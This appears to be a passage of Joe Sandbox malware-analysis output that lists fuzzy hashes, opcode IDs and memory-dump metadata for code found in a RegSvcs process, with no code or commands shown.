                                                                                                              • Opcode ID: 7b8dae689103e6e36277393409c24e9ffada239b32e29f0c55d9b8c1ab9fa4ac
                                                                                                              • Instruction ID: 439891507276de58aa8c208d2864cd6217ff5d22c64563f4920745ef451214f6
                                                                                                              • Opcode Fuzzy Hash: 7b8dae689103e6e36277393409c24e9ffada239b32e29f0c55d9b8c1ab9fa4ac
                                                                                                              • Instruction Fuzzy Hash: 010144B1A0020AEFDB04DFA9E84599EBBF8FF58304F50406AF914EB350D6749D018BA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                              • Instruction ID: b1254094f2ea8d9aebf6e383ecf6f748c5bba85fa3f2e2584f973bd6e9122f30
                                                                                                              • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                              • Instruction Fuzzy Hash: 2D01A231601685AFD327DA9DCD09B5EBB98FF51B54F094469FA488F7A1D7A4C800C251
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ec80a384fa4aaab53625206126903fb741f8e2e4df626ace2bd5daf22848a6f1
                                                                                                              • Instruction ID: 966dd5d5ac826c09ba6a55dba2f2a1430372830a4ba0bf20db5be4207e41a811
                                                                                                              • Opcode Fuzzy Hash: ec80a384fa4aaab53625206126903fb741f8e2e4df626ace2bd5daf22848a6f1
                                                                                                              • Instruction Fuzzy Hash: 5E014F71A0024AEBDB14DFA9E845AEEBBF8BF58314F14405AE501BB390D774EA01CB95
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                              • Instruction ID: 3fcf55d92ac92e28293a5e81589c798b1b60c854bc7449f00967924c6c8e5a91
                                                                                                              • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                              • Instruction Fuzzy Hash: A0F0F97220001EBFEF019F95DD80DAF7B7EFB99298B144125FA1196160D671DD21ABA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: eea92a17f872b10cce13c26eb580bb3f63d335f1f7dafb6c3244fc3f10383c36
                                                                                                              • Instruction ID: 14c5b314d34cdd41e0af1a91eaece8d08b773bd5f13592661311feee7b91f8db
                                                                                                              • Opcode Fuzzy Hash: eea92a17f872b10cce13c26eb580bb3f63d335f1f7dafb6c3244fc3f10383c36
                                                                                                              • Instruction Fuzzy Hash: 17018936105149EBCF129E94DC40EDE7F66FB4C754F098205FE1966224C736D971EB81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 17d3c91de0edac1a8945bebf03e70381161d84a9a480369144bab9a83bc1f1ec
                                                                                                              • Instruction ID: a5a6e15789e29eddcf7423360b0723a4b3ec04de62c4fbf73df7568bac72b3e7
                                                                                                              • Opcode Fuzzy Hash: 17d3c91de0edac1a8945bebf03e70381161d84a9a480369144bab9a83bc1f1ec
                                                                                                              • Instruction Fuzzy Hash: A8F024716142425BF714B6299C81BA332DAF7E4754F25846AEB099F2C1E970DC0183F4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5c71df7c926db4e626c18f06ce154917c9cd0163fc5111427db1a1d604929e96
                                                                                                              • Instruction ID: bd4793aba174694b5354ea48b8f623765206a07d90f5be9a2959a0905b55ea6a
                                                                                                              • Opcode Fuzzy Hash: 5c71df7c926db4e626c18f06ce154917c9cd0163fc5111427db1a1d604929e96
                                                                                                              • Instruction Fuzzy Hash: 3701A470240682DFF3379FACCD48B2A77E4BB54F44F980598BA018F7DADB68D5018614
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                              • Instruction ID: 9e8200905a20c2269d5b47346d29558f5b820e4f1fbe1e005126a7d14914af1b
                                                                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                              • Instruction Fuzzy Hash: DDF0E231B81A234BFB36AA2F8C20B2EEA96AFD0E40B05052C9611CB780DF20DC018780
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                              • Instruction ID: d2cd73ffa624666e99a351d539025162e6d293e6f9bc20b6787d1d6fddddb455
                                                                                                              • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                              • Instruction Fuzzy Hash: 03F0B432B505129FD3628A4DDC80F16B769BFD5A60F5E0024AE049B368C361EC0287D0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e954c2fee88d874f737b0f9248207e6c7e3f663219c71da3f1d91080497b845f
                                                                                                              • Instruction ID: 51a09b4c9239cc714d3622adffffa39f085d2ef23a9b601be5dad0e5204d0857
                                                                                                              • Opcode Fuzzy Hash: e954c2fee88d874f737b0f9248207e6c7e3f663219c71da3f1d91080497b845f
                                                                                                              • Instruction Fuzzy Hash: 0CF0AF706153059FC360EF69C845A1EBBE4FF98710F44465ABC98DB394E634E901C796
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                              • Instruction ID: 4c3e4f3ae58da589689acd0e66e9a0ce77d5d964f2e63558a31c37f2eebed15e
                                                                                                              • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                              • Instruction Fuzzy Hash: 6EF09072610205EEE714DF65CC01F56B6E9FF98740F14C468A545DB1A4FAB0DD01C654
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6c39258056f666818ad8ca7914265b1b3d9fdb20952ff3d48ce7b7d603b6b956
                                                                                                              • Instruction ID: 90b3ef44723d378e3999032160787dba4385fcc98d45d2a54f5932923df70687
                                                                                                              • Opcode Fuzzy Hash: 6c39258056f666818ad8ca7914265b1b3d9fdb20952ff3d48ce7b7d603b6b956
                                                                                                              • Instruction Fuzzy Hash: F6F06270A0124AEFCB14EFA9C915A5EB7B4FF58300F008066B955EB395DA78EA01CB94
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 595138f6757c0a88f0012d15e70dfb387187931e272df8b5e609c0a02175ce52
                                                                                                              • Instruction ID: d09f47e7374f148e87aca9b6f50b7eed0f9673f8156f8289e63557c4e9fd70ca
                                                                                                              • Opcode Fuzzy Hash: 595138f6757c0a88f0012d15e70dfb387187931e272df8b5e609c0a02175ce52
                                                                                                              • Instruction Fuzzy Hash: E6F0B4319166D19FEF32CB5CC654B297BD8FB00630F084D6AD5498F502D724DC82C652
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7643b1d28d5f24657e633881b2a2c7b4598c12dc3a321119a55b38679a8f06d1
                                                                                                              • Instruction ID: 88cf8269244027ba295e7cc29f4b521745a5d63e39bb536dec4c9e5fcb2b58cd
                                                                                                              • Opcode Fuzzy Hash: 7643b1d28d5f24657e633881b2a2c7b4598c12dc3a321119a55b38679a8f06d1
                                                                                                              • Instruction Fuzzy Hash: EDF027264156C12BCF726B6CEC503D53B56A752214F0A2189DDA05B305C674C493C3AA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 823675eb2c2e550174d758043ca7b5b285f0e76b37ab28020a5468ea3dfb912a
                                                                                                              • Instruction ID: 49d4c569dc1c99abe9edc6e3c43eb6d76c82b8f227f68ad005c634f0bb3a0ae4
                                                                                                              • Opcode Fuzzy Hash: 823675eb2c2e550174d758043ca7b5b285f0e76b37ab28020a5468ea3dfb912a
                                                                                                              • Instruction Fuzzy Hash: A2F0E2725116919FE7229FACC388B297BD8BB40FA0F0CA82DD40ECF512C660E8C0CA50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                              • Instruction ID: 83f55c39bcd2839006edffd4a93fb3aba2f55ebad65de306170161d1e2635aa4
                                                                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                              • Instruction Fuzzy Hash: A8E092323406022BE7219E5D8C80F47776EAFD2B10F044079B6045E251CAE29C0983A4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                              • Instruction ID: c590b10926a6b011ebb9bfdb50a7500c063f263b843bb46ca0d4d00809975ab4
                                                                                                              • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                              • Instruction Fuzzy Hash: D7F0A0721006149FE3218F09DE40F52B7F8EB05364F41C025EA088B260D37DEC40DFA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                              • Instruction ID: fb9945a591913aa498260b12640a9f8965796502984097be0877a5b027982a8a
                                                                                                              • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                              • Instruction Fuzzy Hash: A8F0E53A204351DBDF1ACF19D440A9D7BE8FB41360F040854F8468F341E731E981CB95
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                              • Instruction ID: f0614b1097e27d13e36f26bc61e31a781d5d7f917d832d6ad7245e29ea48bdbd
                                                                                                              • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                              • Instruction Fuzzy Hash: 0CE09232254146AFD3211E9D8C10F7A77A7BBD0BA0F15042DE2028F150DBB0DC40C798
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b7f0a8e81d076e708d529442b62d917637f974a7560669e6446fbdb31b14656a
                                                                                                              • Instruction ID: 600666e7a64a5c88e07a180a2a19e7a89a96e7f529ff09216d3ab6aa707b4d0a
                                                                                                              • Opcode Fuzzy Hash: b7f0a8e81d076e708d529442b62d917637f974a7560669e6446fbdb31b14656a
                                                                                                              • Instruction Fuzzy Hash: F8F0E531A25991CFE772D72CE980B65B7E8AF50631F0A1554D4008BA12CB20DC80C690
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                              • Instruction ID: e871e06ed3859508619dd7ff3c6efa906bab7ac56823ec646dd6b30e0c4c4617
                                                                                                              • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                              • Instruction Fuzzy Hash: F7E04F72A40115BFDB22A799CD05FAABEBCEBD4EA0F554095B602EB190E570DE00D6A0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                              • Instruction ID: 52d71cfde0eccb003dcb33f70f3d46c696071266d9deee2c019d1b8f9ba07226
                                                                                                              • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                              • Instruction Fuzzy Hash: 4EE065316403508BCF25CA1AC940A53B7ADDFD56A0F16807DE90547712C371E842C690
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: c4ec20401a4f00edc4d3c40b801d16ef5348a1ab8573d48b789ab28d9976608a
                                                                                                              • Instruction ID: 12a40c380665d03385fa02b3dc6404475c3d535ef0a8ab4f8f48619b4813c8ea
                                                                                                              • Opcode Fuzzy Hash: c4ec20401a4f00edc4d3c40b801d16ef5348a1ab8573d48b789ab28d9976608a
                                                                                                              • Instruction Fuzzy Hash: B8E09232100595ABC721BB29DD11F8A77AAFFA1364F014515F1555B190CB70AC50C7C4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                              • Instruction ID: d8d97f50160fec4ad801f7897c549613c69d7ed9f445ceec9dbf9d61871a5298
                                                                                                              • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                              • Instruction Fuzzy Hash: 25E09B31051612EFE7316F5ADC48B567AE1FF90711F148C1C90D7166B0C7B498C1C740
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                              • Instruction ID: 785ff1543a9825f16b56d8e3d075e8457bc4151e1c9c736dd5ec257bed8e9027
                                                                                                              • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                              • Instruction Fuzzy Hash: 72E0C2343003058FE715CF1AC450B627BB6BFD5B11F28C068A9488F309EB32E882CB40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                              • Instruction ID: 8f0e305fdd231c88e6ad6e7105bd7ddcd115faadcf7d48a7da8b6cca20e79abe
                                                                                                              • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                              • Instruction Fuzzy Hash: 0CE0C232440A22EFEB323F19DC00F5576E1FF94B11F504C2AE0C22E0A487B0AC81CB44
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6e94784816c1a202c8c2d23c53a1babc29b9342c1da4805863c07933b7b7ccb5
                                                                                                              • Instruction ID: ed4b34b8b093bc9a7e06ea2da905689c451e38a437875cdce30f169f5b1c8658
                                                                                                              • Opcode Fuzzy Hash: 6e94784816c1a202c8c2d23c53a1babc29b9342c1da4805863c07933b7b7ccb5
                                                                                                              • Instruction Fuzzy Hash: ADE08C321004A16BC721FA5DED10E4A73AAFFE5260F000221F1508B690CA60AC41C795
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                              • Instruction ID: 1ec6650b0915392fa18e0428117154c189b68e74955eb0ca8da5256637350019
                                                                                                              • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                              • Instruction Fuzzy Hash: CEE08633111A148BC728DE5CD911B7677E4FF45B30F09463EA6134B790C574E944C794
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                              • Instruction ID: 6c36053f0a5f77db29a7c20267df18aca3f93866cf8f2535144126d27d114eae
                                                                                                              • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                              • Instruction Fuzzy Hash: 47D0A932664620AFD772AA1CFC00FC373EABB88724F060459B008CB1A1C360AC81CA84
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                              • Instruction ID: 6010ea78b23dd19496801a6139fa296e7fd34204ad16b3d688f7b4d4e78d8c9f
                                                                                                              • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                              • Instruction Fuzzy Hash: 02E0EC35950685AFDF57DF99DA40F5EBBB5FB94B40F150458A1085F760C725AD00CB40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                              • Instruction ID: 825880ed5741cdc4aac78e71acdeb43f70be195a92d5c6644828a193599619db
                                                                                                              • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                              • Instruction Fuzzy Hash: 0BD02232222031E7CB286655AC10F6BB906BFC0A94F0A002E340AAB800C1048C43C2E0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                              • Instruction ID: 2fa26d15f785120ec18f3ab6f7575dc7b4176845ad096b03dae116b254a8e9e6
                                                                                                              • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                              • Instruction Fuzzy Hash: 58D012371E054DBBCB119F66DC01F957BA9FBA4BA0F444020B5048B5A0C63AE950D584
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fb29844d38a1584afe132ef9516276f3ed454406c3d1a3f94fd294ac1a50fa7a
                                                                                                              • Instruction ID: 947b91c54d802c05fd1419757f259393ed52c2cf8551192e1c6dba43fa456fb8
                                                                                                              • Opcode Fuzzy Hash: fb29844d38a1584afe132ef9516276f3ed454406c3d1a3f94fd294ac1a50fa7a
                                                                                                              • Instruction Fuzzy Hash: 3CD05E309520029FDF2BCF48CD2493E76B4FF10A40B44106CE60056520D364D8118600
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
